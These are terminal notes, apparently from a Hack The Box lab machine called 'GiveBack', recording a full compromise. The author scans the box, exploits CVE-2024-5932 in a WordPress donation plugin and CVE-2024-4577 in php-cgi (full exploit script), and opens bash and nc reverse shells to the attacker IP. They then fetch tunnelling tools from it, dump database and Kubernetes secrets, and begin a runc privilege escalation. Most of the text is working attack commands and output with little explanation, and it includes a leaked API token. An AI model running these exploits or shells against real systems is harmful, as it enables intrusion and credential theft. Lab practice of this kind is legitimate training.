nmap -sV -sC -p- -Pn 10.10.11.94 -oN nmap                                                                                                           130 ↵
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-05 16:26 EST
Nmap scan report for 10.10.11.94
Host is up (0.042s latency).
Not shown: 65530 closed tcp ports (reset)
PORT      STATE    SERVICE      VERSION
22/tcp    open     ssh          OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 66:f8:9c:58:f4:b8:59:bd:cd:ec:92:24:c3:97:8e:9e (ECDSA)
|_  256 96:31:8a:82:1a:65:9f:0a:a2:6c:ff:4d:44:7c:d3:94 (ED25519)
80/tcp    open     http         nginx 1.28.0
|_http-server-header: nginx/1.28.0
|_http-title: GIVING BACK IS WHAT MATTERS MOST – OBVI
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-generator: WordPress 6.8.1
6443/tcp  filtered sun-sr-https
10250/tcp filtered unknown
30686/tcp open     unknown
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 200 OK
|     Content-Type: application/json
|     X-Content-Type-Options: nosniff
|     X-Load-Balancing-Endpoint-Weight: 1
|     Date: Wed, 05 Nov 2025 21:26:44 GMT
|     Content-Length: 127
|     "service": {
|     "namespace": "default",
|     "name": "wp-nginx-service"
|     "localEndpoints": 1,
|     "serviceProxyHealthy": true
|   GenericLines, Help, Kerberos, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest, HTTPOptions: 
|     HTTP/1.0 200 OK
|     Content-Type: application/json
|     X-Content-Type-Options: nosniff
|     X-Load-Balancing-Endpoint-Weight: 1
|     Date: Wed, 05 Nov 2025 21:26:19 GMT
|     Content-Length: 127
|     "service": {
|     "namespace": "default",
|     "name": "wp-nginx-service"
|     "localEndpoints": 1,
|_    "serviceProxyHealthy": true
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
 

sudo wpscan -e ap -t 500 --url http://10.10.11.94 --api-token ZHnKbWjJuwEa5eShsBKgO7DzUr6lm2vehjiBnrspAQo

[+] give
 | Location: http://10.10.11.94/wp-content/plugins/give/
 | Last Updated: 2025-11-05T14:00:00.000Z
 | [!] The version is out of date, the latest version is 4.13.0
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By:
 |  Urls In 404 Page (Passive Detection)
 |  Meta Tag (Passive Detection)
 |  Javascript Var (Passive Detection)

pip3 install -r requirements.txt --break-system-packages

python3 CVE-2024-5932-rce.py -u http://giveback.htb/donations/the-things-we-need/ -c 'ping 10.10.14.10'

, length 0
16:49:45.900872 IP giveback.htb.http > 10.10.14.10.60248: Flags [F.], seq 8377, ack 195, win 501, options [nop,nop,TS val 1699612084 ecr 3504984991], length 0
16:49:45.900899 IP 10.10.14.10.60248 > giveback.htb.http: Flags [.], ack 8378, win 569, options [nop,nop,TS val 3504985008 ecr 1699612084], length 0
16:49:45.906428 IP giveback.htb.http > 10.10.14.10.60264: Flags [S.], seq 2485002235, ack 1135454812, win 64308, options [mss 1362,sackOK,TS val 1699612090 ecr 3504984998,nop,wscale 7], length 0
16:49:45.906482 IP 10.10.14.10.60264 > giveback.htb.http: Flags [.], ack 1, win 502, options [nop,nop,TS val 3504985014 ecr 1699612090], length 0
16:49:45.906559 IP 10.10.14.10.60264 > giveback.htb.http: Flags [P.], seq 1:325, ack 1, win 502, options [nop,nop,TS val 3504985014 ecr 1699612090], length 324: HTTP: POST /wp-admin/admin-ajax.php HTTP/1.1
16:49:45.906571 IP 10.10.14.10.60264 > giveback.htb.http: Flags [P.], seq 325:1357, ack 1, win 502, options [nop,nop,TS val 3504985014 ecr 1699612090], length 1032: HTTP
16:49:45.922216 IP giveback.htb.http > 10.10.14.10.60264: Flags [.], ack 325, win 501, options [nop,nop,TS val 1699612106 ecr 3504985014], length 0
16:49:45.922235 IP giveback.htb.http > 10.10.14.10.60264: Flags [.], ack 1357, win 501, options [nop,nop,TS val 1699612106 ecr 3504985014], length 0
16:49:46.041422 IP giveback.htb.http > 10.10.14.10.60264: Flags [P.], seq 1:981, ack 1357, win 501, options [nop,nop,TS val 1699612224 ecr 3504985014], length 980: HTTP: HTTP/1.1 500 Internal Server Error
16:49:46.041466 IP 10.10.14.10.60264 > giveback.htb.http: Flags [.], ack 981, win 495, options [nop,nop,TS val 3504985149 ecr 1699612224], length 0
16:49:46.042143 IP 10.10.14.10.60264 > giveback.htb.http: Flags [F.], seq 1357, ack 981, win 495, options [nop,nop,TS val 3504985149 ecr 1699612224], length 0
16:49:46.057636 IP giveback.htb.http > 10.10.14.10.60264: Flags [F.], seq 981, ack 1358, win 501, options [nop,nop,TS val 1699612241 ecr 3504985149], length 0
16:49:46.057656 IP 10.10.14.10.60264 > giveback.htb.http: Flags [.], ack 982, win 495, options [nop,nop,TS val 3504985165 ecr 1699612241], length 0

python3 CVE-2024-5932-rce.py -u http://giveback.htb/donations/the-things-we-need/ -c "bash -c 'bash -i >& /dev/tcp/10.10.14.10/80 0>&1'"

rlwrap nc -lnvp 80
Listening on 0.0.0.0 80
Connection received on 10.10.11.94 1553
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
<-68dc7dc988-s8g7m:/opt/bitnami/wordpress/wp-admin$ whoami
whoami
whoami: cannot find name for user ID 1001
<-68dc7dc988-s8g7m:/opt/bitnami/wordpress/wp-admin$ id
id
uid=1001 gid=0(root) groups=0(root),1001

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'bitnami_wordpress' );
 
/** Database username */
define( 'DB_USER', 'bn_wordpress' );
 
/** Database password */
define( 'DB_PASSWORD', 'sW5sp4spa3u7RLyetrekE4oS' );
 
/** Database hostname */
define( 'DB_HOST', 'beta-vino-wp-mariadb:3306' );
 
 

/opt/bitnami/mysql/bin/mariadb -u bn_wordpress -p'sW5sp4spa3u7RLyetrekE4oS' -h beta-vino-wp-mariadb -P 3306 -e "SHOW DATABASES;"
Database
bitnami_wordpress
information_schema

<p-wordpress-68dc7dc988-s8g7m:/opt/bitnami/scripts$ /opt/bitnami/mysql/bin/mariadb -u bn_wordpress -p'sW5sp4spa3u7RLyetrekE4oS' -h beta-vino-wp-mariadb -P 3306 -e "use bitnami_wordpress; show tables;"
<db -P 3306 -e "use bitnami_wordpress; show tables;"
Tables_in_bitnami_wordpress
wp_actionscheduler_actions
wp_actionscheduler_claims
wp_actionscheduler_groups
wp_actionscheduler_logs
wp_aioseo_cache
wp_commentmeta
wp_comments
wp_give_commentmeta
wp_give_comments
wp_give_donationmeta
wp_give_donormeta
wp_give_donors
wp_give_formmeta
wp_give_log
wp_give_migrations
wp_give_revenue
wp_give_sequential_ordering
wp_give_sessions
wp_give_subscriptionmeta
wp_give_subscriptions
wp_links
wp_options
wp_postmeta
wp_posts
wp_term_relationships
wp_term_taxonomy
wp_termmeta
wp_terms
wp_usermeta
wp_users

<p-wordpress-68dc7dc988-s8g7m:/opt/bitnami/scripts$ /opt/bitnami/mysql/bin/mariadb -u bn_wordpress -p'sW5sp4spa3u7RLyetrekE4oS' -h beta-vino-wp-mariadb -P 3306 -e "use bitnami_wordpress; select * from wp_users;"
<-e "use bitnami_wordpress; select * from wp_users;"
ID	user_login	user_pass	user_nicename	user_email	user_url	user_registered	user_activation_key	user_status	display_name
1	user	$wp$2y$10$a6fY4Ww3s.qVvLn0DM.LM.2KPy0ptIz/NWpvZAVUf7SMD.tx2KpMG	user	user@example.com	http://127.0.0.1	2024-09-21 22:18:28	0babywyrm

I have no name!@beta-vino-wp-wordpress-68dc7dc988-s8g7m:/tmp$ php -r 'file_put_contents("/tmp/chisel", file_get_contents("http://10.10.14.10:8000/chisel"));'
<e_get_contents("http://10.10.14.10:8000/chisel"));'

./chisel server --reverse --port 1234

I have no name!@beta-vino-wp-wordpress-68dc7dc988-s8g7m:/tmp$ ./chisel client -v 10.10.14.10:1234 socks

<-68dc7dc988-s8g7m:/opt/bitnami/wordpress/wp-admin$ php -r 'echo @file_get_contents("http://10.43.2.241:5000");' | sed -n '1,200p'
<ents("http://10.43.2.241:5000");' | sed -n '1,200p'
<!DOCTYPE html>
<html>
<head>
  <title>GiveBack LLC Internal CMS</title>
  <!-- Developer note: phpinfo accessible via debug mode during migration window -->
  <style>
    body { font-family: Arial, sans-serif; margin: 40px; background: #f9f9f9; }
    .header { color: #333; border-bottom: 1px solid #ccc; padding-bottom: 10px; }
    .info { background: #eef; padding: 15px; margin: 20px 0; border-radius: 5px; }
    .warning { background: #fff3cd; border: 1px solid #ffeeba; padding: 10px; margin: 10px 0; }
    .resources { margin: 20px 0; }
    .resources li { margin: 5px 0; }
    a { color: #007bff; text-decoration: none; }
    a:hover { text-decoration: underline; }
  </style>
</head>
<body>
  <div class="header">
    <h1>🏢 GiveBack LLC Internal CMS System</h1>
    <p><em>Development Environment – Internal Use Only</em></p>
  </div>
 
  <div class="warning">
    <h4>⚠️ Legacy Notice</h4>
    <p>**SRE** - This system still includes legacy CGI support. Cluster misconfiguration may likely expose internal scripts.</p>
  </div>
 
  <div class="resources">
    <h3>Internal Resources</h3>
    <ul>
      <li><a href="/admin/">/admin/</a> — VPN Required</li>
      <li><a href="/backups/">/backups/</a> — VPN Required</li>
      <li><a href="/runbooks/">/runbooks/</a> — VPN Required</li>
      <li><a href="/legacy-docs/">/legacy-docs/</a> — VPN Required</li>
      <li><a href="/debug/">/debug/</a> — Disabled</li>
      <li><a href="/cgi-bin/info">/cgi-bin/info</a> — CGI Diagnostics</li>
      <li><a href="/cgi-bin/php-cgi">/cgi-bin/php-cgi</a> — PHP-CGI Handler</li>
      <li><a href="/phpinfo.php">/phpinfo.php</a></li>
      <li><a href="/robots.txt">/robots.txt</a> — Crawlers: Disallowed</li>
    </ul>
  </div>
 
  <div class="info">
    <h3>Developer Note</h3>
    <p>This CMS was originally deployed on Windows IIS using <code>php-cgi.exe</code>.
    During migration to Linux, the Windows-style CGI handling was retained to ensure
    legacy scripts continued to function without modification.</p>
  </div>
</body>
</html>
<-68dc7dc988-s8g7m:/opt/bitnami/wordpress/wp-admin$ 
 

I have no name!@beta-vino-wp-wordpress-68dc7dc988-s8g7m:/tmp$ php -r 'file_put_contents("/tmp/agent", file_get_contents("http://10.10.14.10:8000/agent"));'

sudo ip tuntap add user sake mode tun ligolo
sudo ip link set ligolo up

./proxy -selfcert                                                                                                                                     1 ↵
INFO[0000] Loading configuration file ligolo-ng.yaml    
WARN[0000] daemon configuration file not found. Creating a new one... 
? Enable Ligolo-ng WebUI? No
WARN[0006] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC! 
ERRO[0006] Certificate cache error: acme/autocert: certificate cache miss, returning a new certificate 
INFO[0006] Listening on 0.0.0.0:11601           

I have no name!@beta-vino-wp-wordpress-68dc7dc988-s8g7m:/tmp$ ./agent -connect 10.10.14.10:11601 -ignore-cert

ligolo-ng » session
? Specify a session : 1 - Unknown@beta-vino-wp-wordpress-68dc7dc988-s8g7m - 10.10.11.94:5779 - 66175bf4fc34
[Agent : Unknown@beta-vino-wp-wordpress-68dc7dc988-s8g7m] » start

sudo ip route add 10.43.2.0/24 dev ligolo

curl -si http://10.43.2.241:5000/cgi-bin/php-cgi
 
HTTP/1.1 200 OK
Server: nginx/1.24.0
Date: Thu, 06 Nov 2025 23:08:42 GMT
Content-Type: text/plain;charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.3.3
 
OK#

import warnings
warnings.filterwarnings("ignore", category=DeprecationWarning)
import requests
requests.packages.urllib3.disable_warnings()
import argparse
 
parser = argparse.ArgumentParser()
parser.add_argument('--target', '-t', required=True)
args = parser.parse_args()
 
print("[+] Interactive Shell\n")
while True:
    cmd = input("$ ")
    if cmd.lower() in ['exit', 'quit']: break
    res = requests.post(f"{args.target}?%ADd+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input", 
                       data=f"echo `{cmd}`; die;", verify=False)
    print(res.text.strip())

python3 watchTowr-vs-php_cve-2024-4577.py --target http://10.43.2.241:5000/cgi-bin/php-cgi
[+] Interactive Shell
 
$ id
[START]uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
[END]
 

$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.10 81 >/tmp/f

rlwrap nc -lnvp 81 
Listening on 0.0.0.0 81
Connection received on 10.10.11.94 25349
/bin/sh: can't access tty; job control turned off
/var/www/html/cgi-bin # id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)

/ # id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
 

/run/secrets/kubernetes.io # cd /var/run/secrets/kubernetes.io/serviceaccount/
 

/run/secrets/kubernetes.io/serviceaccount # env | grep -i kubernetes
 
KUBERNETES_PORT=tcp://10.43.0.1:443
KUBERNETES_SERVICE_PORT=443
OLDPWD=/var/run/secrets/kubernetes.io
KUBERNETES_PORT_443_TCP_ADDR=10.43.0.1
KUBERNETES_PORT_443_TCP_PORT=443
KUBERNETES_PORT_443_TCP_PROTO=tcp
KUBERNETES_SERVICE_PORT_HTTPS=443
KUBERNETES_PORT_443_TCP=tcp://10.43.0.1:443
KUBERNETES_SERVICE_HOST=10.43.0.1
PWD=/var/run/secrets/kubernetes.io/serviceaccount

TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
NAMESPACE=$(cat /var/run/secrets/kubernetes.io/serviceaccount/namespace)
API_SERVER="https://10.43.0.1:443"

curl -k -H "Authorization: Bearer $TOKEN" "$API_SERVER/api"
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0{
  "kind": "APIVersions",
  "versions": [
    "v1"
  ],
  "serverAddressByClientCIDRs": [
    {
      "clientCIDR": "0.0.0.0/0",
      "serverAddress": "10.10.11.94:6443"
    }
  ]
 

curl -k -s -H "Authorization: Bearer $TOKEN" "https://10.43.0.1:443/api/v1/namespaces/default/secrets"

echo "Current namespace: $NAMESPACE"
Current namespace: default

curl -k -s -H "Authorization: Bearer $TOKEN" "https://10.43.0.1:443/api/v1/namespaces/default/secrets"

echo "Y0hCVkk3aG1PVHAycnBqSTVoZEl5TEZ4bk5kWG55" | base64 -d
cHBVI7hmOTp2rpjI5hdIyLFxnNdXny

echo "T2pGaTNhMXp3ZEVQOTdvbnZoUE1zZjR4eFo4TXdaeGU=" | base64 -d
OjFi3a1zwdEP97onvhPMsf4xxZ8MwZxe

echo "TzhGN0tSNXpHaQ==" | base64 -d                                                                                                                   1 ↵
O8F7KR5zGi

echo "QTU2bTg0d1JxbTJDY1VweE9KdFUyTzRHOG1nREV4" | base64 -d                                                                                         255 ↵
A56m84wRqm2CcUpxOJtU2O4G8mgDEx

ssh babywyrm@10.10.11.94                                                                                                                            130 ↵ 
babywyrm@10.10.11.94's password:  A56m84wRqm2CcUpxOJtU2O4G8mgDEx
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-124-generic x86_64)
 
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro
 
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
 
To restore this content, you can run the 'unminimize' command.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
 
Last login: Fri Nov 7 17:15:47 2025 from 10.10.14.10
babywyrm@giveback:~$ whoami
babywyrm

babywyrm@giveback:~$ sudo -l
Matching Defaults entries for babywyrm on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty, timestamp_timeout=0,
    timestamp_timeout=20
 
User babywyrm may run the following commands on localhost:
    (ALL) NOPASSWD: !ALL
    (ALL) /opt/debug
 

babywyrm@giveback:~$ cat user.txt
a9cb14db...

╔══════════╣ Active Ports
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#open-ports
══╣ Active Ports (netstat)
tcp        0      0 127.0.0.1:10010         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:10249         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:10248         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:10257         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:10256         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:10259         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:10258         0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:6444          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::30686                :::*                    LISTEN      -                   
tcp6       0      0 :::6443                 :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 :::10250                :::*                    LISTEN      -                   
 
 

╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid
Matching Defaults entries for babywyrm on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty, timestamp_timeout=0, timestamp_timeout=20
 
User babywyrm may run the following commands on localhost:
    (ALL) NOPASSWD: !ALL
    (ALL) /opt/debug

babywyrm@giveback:/opt$ id
uid=1000(babywyrm) gid=1000(babywyrm) groups=1000(babywyrm),4(adm),30(dip)

babywyrm@giveback:/var/log$ cat boot_script.log
sealedsecret.bitnami.com "user-secret-babywyrm" deleted
secret "user-secret-babywyrm" deleted
Error from server (NotFound): error when deleting "sealed-masterpass-secret.yaml": sealedsecrets.bitnami.com "masterpass-secret" not found
Deleting existing masterpass-secret...
Creating new masterpass-secret with value from /tmp/masterpass.txt
sealedsecret.bitnami.com/user-secret-babywyrm created
Creating new user-secret-sydneysweeney with random value
sealedsecret.bitnami.com/user-secret-sydneysweeney created
Creating new user-secret-margotrobbie with random value
sealedsecret.bitnami.com/user-secret-margotrobbie created
Applying updated YAML...
serviceaccount/secret-reader-sa unchanged
role.rbac.authorization.k8s.io/secret-reader unchanged
rolebinding.rbac.authorization.k8s.io/legacy-cms-secret-reader unchanged
Restarting the WordPress deployment...
deployment.apps/beta-vino-wp-wordpress restarted
Waiting for user-secret-babywyrm to be created by controller...
user-secret-babywyrm available after 2 seconds
Sealed MASTERPASS (from Kubernetes secret): 2rNCmALF2au2tfXzV9LZM7K1ihb4o
Local MASTERPASS (from temp file): 2rNCmALF2au2tfXzV9LZM7K1ihb4o
Setting password for 'babywyrm' on system...
Password for 'babywyrm' has been set successfully.
boot.sh completed successfully.
Warning: Immediate deletion does not wait for confirmation that the running resource has been terminated. The resource may continue to run on the cluster indefinitely.
pod "coredns-68d76bdc99-9t4l6" force deleted
sealedsecret.bitnami.com "user-secret-babywyrm" deleted
sealedsecret.bitnami.com "user-secret-margotrobbie" deleted
sealedsecret.bitnami.com "user-secret-sydneysweeney" deleted
secret "user-secret-babywyrm" deleted
Error from server (NotFound): error when deleting "sealed-masterpass-secret.yaml": sealedsecrets.bitnami.com "masterpass-secret" not found
Deleting existing masterpass-secret...
Creating new masterpass-secret with value from /tmp/masterpass.txt
sealedsecret.bitnami.com/user-secret-babywyrm created
user-secret-sydneysweeney already exists, skipping.
user-secret-margotrobbie already exists, skipping.
Applying updated YAML...
serviceaccount/secret-reader-sa unchanged
role.rbac.authorization.k8s.io/secret-reader unchanged
rolebinding.rbac.authorization.k8s.io/legacy-cms-secret-reader unchanged
Restarting the WordPress deployment...
deployment.apps/beta-vino-wp-wordpress restarted
Waiting for user-secret-babywyrm to be created by controller...
user-secret-babywyrm available after 2 seconds
Sealed MASTERPASS (from Kubernetes secret): Y5lEIn7oHzd0ZECzagbAOtr9zt4ffuW
Local MASTERPASS (from temp file): Y5lEIn7oHzd0ZECzagbAOtr9zt4ffuW
Setting password for 'babywyrm' on system...
Password for 'babywyrm' has been set successfully.
boot.sh completed successfully.
sealedsecret.bitnami.com "user-secret-babywyrm" deleted
secret "user-secret-babywyrm" deleted
Error from server (NotFound): error when deleting "sealed-masterpass-secret.yaml": sealedsecrets.bitnami.com "masterpass-secret" not found
Deleting existing masterpass-secret...
Creating new masterpass-secret with value from /tmp/masterpass.txt
sealedsecret.bitnami.com/user-secret-babywyrm created
Creating new user-secret-sydneysweeney with random value
sealedsecret.bitnami.com/user-secret-sydneysweeney created
Creating new user-secret-margotrobbie with random value
sealedsecret.bitnami.com/user-secret-margotrobbie created
Applying updated YAML...
serviceaccount/secret-reader-sa unchanged
role.rbac.authorization.k8s.io/secret-reader unchanged
rolebinding.rbac.authorization.k8s.io/legacy-cms-secret-reader unchanged
Restarting the WordPress deployment...
deployment.apps/beta-vino-wp-wordpress restarted
Waiting for user-secret-babywyrm to be created by controller...
user-secret-babywyrm available after 2 seconds
Sealed MASTERPASS (from Kubernetes secret): KliDbpcmnZGdrij2zXUf98VGGMpZYMQR
Local MASTERPASS (from temp file): KliDbpcmnZGdrij2zXUf98VGGMpZYMQR
Setting password for 'babywyrm' on system...
Password for 'babywyrm' has been set successfully.
boot.sh completed successfully.
sealedsecret.bitnami.com "user-secret-babywyrm" deleted
sealedsecret.bitnami.com "user-secret-margotrobbie" deleted
sealedsecret.bitnami.com "user-secret-sydneysweeney" deleted
secret "user-secret-babywyrm" deleted
Error from server (NotFound): error when deleting "sealed-masterpass-secret.yaml": sealedsecrets.bitnami.com "masterpass-secret" not found
Deleting existing masterpass-secret...
Creating new masterpass-secret with value from /tmp/masterpass.txt
sealedsecret.bitnami.com/user-secret-babywyrm created
user-secret-sydneysweeney already exists, skipping.
user-secret-margotrobbie already exists, skipping.
Applying updated YAML...
serviceaccount/secret-reader-sa unchanged
role.rbac.authorization.k8s.io/secret-reader unchanged
rolebinding.rbac.authorization.k8s.io/legacy-cms-secret-reader unchanged
Restarting the WordPress deployment...
deployment.apps/beta-vino-wp-wordpress restarted
Waiting for user-secret-babywyrm to be created by controller...
user-secret-babywyrm available after 2 seconds
Sealed MASTERPASS (from Kubernetes secret): Fgf1QwvYhtsSwHx6stWOd0yco5HG2SF
Local MASTERPASS (from temp file): Fgf1QwvYhtsSwHx6stWOd0yco5HG2SF
Setting password for 'babywyrm' on system...
Password for 'babywyrm' has been set successfully.
boot.sh completed successfully.
sealedsecret.bitnami.com "user-secret-babywyrm" deleted
secret "user-secret-babywyrm" deleted
Error from server (NotFound): error when deleting "sealed-masterpass-secret.yaml": sealedsecrets.bitnami.com "masterpass-secret" not found
Deleting existing masterpass-secret...
Creating new masterpass-secret with value from /tmp/masterpass.txt
sealedsecret.bitnami.com/user-secret-babywyrm created
Creating new user-secret-sydneysweeney with random value
sealedsecret.bitnami.com/user-secret-sydneysweeney created
Creating new user-secret-margotrobbie with random value
sealedsecret.bitnami.com/user-secret-margotrobbie created
Applying updated YAML...
serviceaccount/secret-reader-sa unchanged
role.rbac.authorization.k8s.io/secret-reader unchanged
rolebinding.rbac.authorization.k8s.io/legacy-cms-secret-reader unchanged
Restarting the WordPress deployment...
deployment.apps/beta-vino-wp-wordpress restarted
Waiting for user-secret-babywyrm to be created by controller...
user-secret-babywyrm available after 2 seconds
Sealed MASTERPASS (from Kubernetes secret): 1IRGZ6iLq9TXsONyrjoa87qtV5IGSw
Local MASTERPASS (from temp file): 1IRGZ6iLq9TXsONyrjoa87qtV5IGSw
Setting password for 'babywyrm' on system...
Password for 'babywyrm' has been set successfully.
boot.sh completed successfully.
sealedsecret.bitnami.com "user-secret-babywyrm" deleted
sealedsecret.bitnami.com "user-secret-margotrobbie" deleted
sealedsecret.bitnami.com "user-secret-sydneysweeney" deleted
secret "user-secret-babywyrm" deleted
Error from server (NotFound): error when deleting "sealed-masterpass-secret.yaml": sealedsecrets.bitnami.com "masterpass-secret" not found
Deleting existing masterpass-secret...
Creating new masterpass-secret with value from /tmp/masterpass.txt
sealedsecret.bitnami.com/user-secret-babywyrm created
user-secret-sydneysweeney already exists, skipping.
user-secret-margotrobbie already exists, skipping.
Applying updated YAML...
serviceaccount/secret-reader-sa unchanged
role.rbac.authorization.k8s.io/secret-reader unchanged
rolebinding.rbac.authorization.k8s.io/legacy-cms-secret-reader unchanged
Restarting the WordPress deployment...
deployment.apps/beta-vino-wp-wordpress restarted
Waiting for user-secret-babywyrm to be created by controller...
user-secret-babywyrm available after 2 seconds
Sealed MASTERPASS (from Kubernetes secret): Zrayvz94wxcw9JyxzOg9SX6F7zMP8p1z
Local MASTERPASS (from temp file): Zrayvz94wxcw9JyxzOg9SX6F7zMP8p1z
Setting password for 'babywyrm' on system...
Password for 'babywyrm' has been set successfully.
boot.sh completed successfully.
sealedsecret.bitnami.com "user-secret-babywyrm" deleted
secret "user-secret-babywyrm" deleted
Error from server (NotFound): error when deleting "sealed-masterpass-secret.yaml": sealedsecrets.bitnami.com "masterpass-secret" not found
Deleting existing masterpass-secret...
Creating new masterpass-secret with value from /tmp/masterpass.txt
sealedsecret.bitnami.com/user-secret-babywyrm created
Creating new user-secret-sydneysweeney with random value
sealedsecret.bitnami.com/user-secret-sydneysweeney created
Creating new user-secret-margotrobbie with random value
sealedsecret.bitnami.com/user-secret-margotrobbie created
Applying updated YAML...
serviceaccount/secret-reader-sa unchanged
role.rbac.authorization.k8s.io/secret-reader unchanged
rolebinding.rbac.authorization.k8s.io/legacy-cms-secret-reader unchanged
Restarting the WordPress deployment...
deployment.apps/beta-vino-wp-wordpress restarted
Waiting for user-secret-babywyrm to be created by controller...
user-secret-babywyrm available after 2 seconds
Sealed MASTERPASS (from Kubernetes secret): A56m84wRqm2CcUpxOJtU2O4G8mgDEx
Local MASTERPASS (from temp file): A56m84wRqm2CcUpxOJtU2O4G8mgDEx
Setting password for 'babywyrm' on system...
Password for 'babywyrm' has been set successfully.
boot.sh completed successfully.
 

      "data": {
        "mariadb-password": "c1c1c3A0c3BhM3U3Ukx5ZXRyZWtFNG9T",
        "mariadb-root-password": "c1c1c3A0c3lldHJlMzI4MjgzODNrRTRvUw=="
      },

babywyrm@giveback:/opt$ sudo /opt/debug
Validating sudo...
Please enter the administrative password: c1c1c3A0c3BhM3U3Ukx5ZXRyZWtFNG9T
 
Both passwords verified. Executing the command...
NAME:
   runc - Open Container Initiative runtime
 
runc is a command line client for running applications packaged according to
the Open Container Initiative (OCI) format and is a compliant implementation of the
Open Container Initiative specification.
 
runc integrates well with existing process supervisors to provide a production
container runtime environment for applications. It can be used with your
existing process monitoring tools and the container will be spawned as a
direct child of the process supervisor.
 
Containers are configured using bundles. A bundle for a container is a directory
that includes a specification file named "config.json" and a root filesystem.
The root filesystem contains the contents of the container.
 
To start a new instance of a container:
 
    # runc run [ -b bundle ] <container-id>
 
Where "<container-id>" is your name for the instance of the container that you
are starting. The name you provide for the container instance must be unique on
your host. Providing the bundle directory using "-b" is optional. The default
value for "bundle" is the current directory.
 
USAGE:
   runc.amd64.debug [global options] command [command options] [arguments...]
 
VERSION:
   1.1.11
commit: v1.1.11-0-g4bccb38c
spec: 1.0.2-dev
go: go1.20.12
libseccomp: 2.5.4
 
COMMANDS:
   checkpoint  checkpoint a running container
   create      create a container
   delete      delete any resources held by the container often used with detached container
   events      display container events such as OOM notifications, cpu, memory, and IO usage statistics
   exec        execute new process inside the container
   kill        kill sends the specified signal (default: SIGTERM) to the container's init process
   list        lists containers started by runc with the given root
   pause       pause suspends all processes inside the container
   ps          ps displays the processes running inside a container
   restore     restore a container from a previous checkpoint
   resume      resumes all processes that have been previously paused
   run         create and run a container
   spec        create a new specification file
   start       executes the user defined process in a created container
   state       output the state of a container
   update      update container resource constraints
   features    show the enabled features
   help, h     Shows a list of commands or help for one command
 
GLOBAL OPTIONS:
   --debug             enable debug logging
   --log value         set the log file to write runc logs to (default is '/dev/stderr')
   --log-format value  set the log format ('text' (default), or 'json') (default: "text")
   --root value        root directory for storage of container state (this should be located in tmpfs) (default: "/run/runc")
   --criu value        path to the criu binary used for checkpoint and restore (default: "criu")
   --systemd-cgroup    enable systemd cgroup support, expects cgroupsPath to be of form "slice:prefix:name" for e.g. "system.slice:runc:434234"
   --rootless value    ignore cgroup permission errors ('true', 'false', or 'auto') (default: "auto")
   --help, -h          show help
   --version, -v       print the version
 

{
    "ociVersion": "1.0.0",
    "process": {
        "terminal": false,
        "user": {"uid": 0, "gid": 0},
        "args": ["/bin/sh", "-i"],
        "cwd": "/",
        "env": ["PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"]
    },
    "root": {"path": "/"},
    "linux": {
        "namespaces": [
            {"type": "pid"},
            {"type": "network"}
        ]
    }
}

babywyrm@giveback:/tmp/runc_escape$ mkdir -p rootfs/bin
babywyrm@giveback:/tmp/runc_escape$ cp /usr/bin/sh rootfs/bin/

babywyrm@giveback:/tmp/escape$ sudo debug run fakecontainter
sudo: debug: command not found
babywyrm@giveback:/tmp/escape$ sudo /opt/debug run fakecontainter
[sudo] password for babywyrm: 
